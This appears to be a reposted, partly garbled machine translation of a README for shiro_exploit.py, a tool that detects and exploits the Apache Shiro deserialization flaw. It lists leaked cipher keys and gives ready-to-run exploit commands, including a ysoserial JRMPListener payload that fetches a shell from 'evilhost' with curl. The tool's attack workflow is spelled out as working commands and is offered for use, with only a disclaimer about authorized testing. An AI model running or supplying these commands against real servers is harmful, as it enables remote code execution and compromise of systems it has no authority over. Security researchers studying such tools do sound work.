IMCAFS

Home

exploit: apache shiro deserialization vulnerability detection and utilization tool

Posted by millikan at 2020-02-29
all

Shiro? Exploit is used to detect and exploit Apache Shiro deserialization vulnerability scripts. It can help enterprises find their own security vulnerabilities.

The script uses the 22 keys collected from the network, uses the urldns gadget in ysoserial tool, and implements vulnerability detection in combination with dnslog platform. For vulnerability exploitation, we can choose gadgets and parameters to enhance flexibility.

Python2.7

Requests

Jdk 1.8

usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY] OPTIONS: -h, --help show this help message and exit -u URL, --url URL Target url. -t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3 -g GADGET, --gadget GADGET gadget -p PARAMS, --params PARAMS gadget params -k KEY, --key KEY CipherKey Example: python shiro_exploit.py -u target

By default, you only need to use the - U parameter.

How to detect available gadgets can be run

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

The program will get the domain name of dnslog to replace the value of {dnshost}. No modification is required. At present, the universality of windows and Linux systems has not been solved. Here - P according to the actual situation of the designated bar.

{dnshost}

If used, jrmp can be used. It can also be used according to the detected gage.

The server:

java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell –o shell'

Local:

python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="

Run the following command:

pip uninstall crypto pycryptodome pip install pycryptodome

Under the python installation directory, change the name of the crypto folder to crypto.

Any other questions or suggestions are welcome to the issue.

The idea of tools can be found in my blog article:

https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/

Note: please do not use the script for illegal purposes, only for legal, authorized penetration test, internal security inspection and research. I have nothing to do with the bad consequences of using the tool.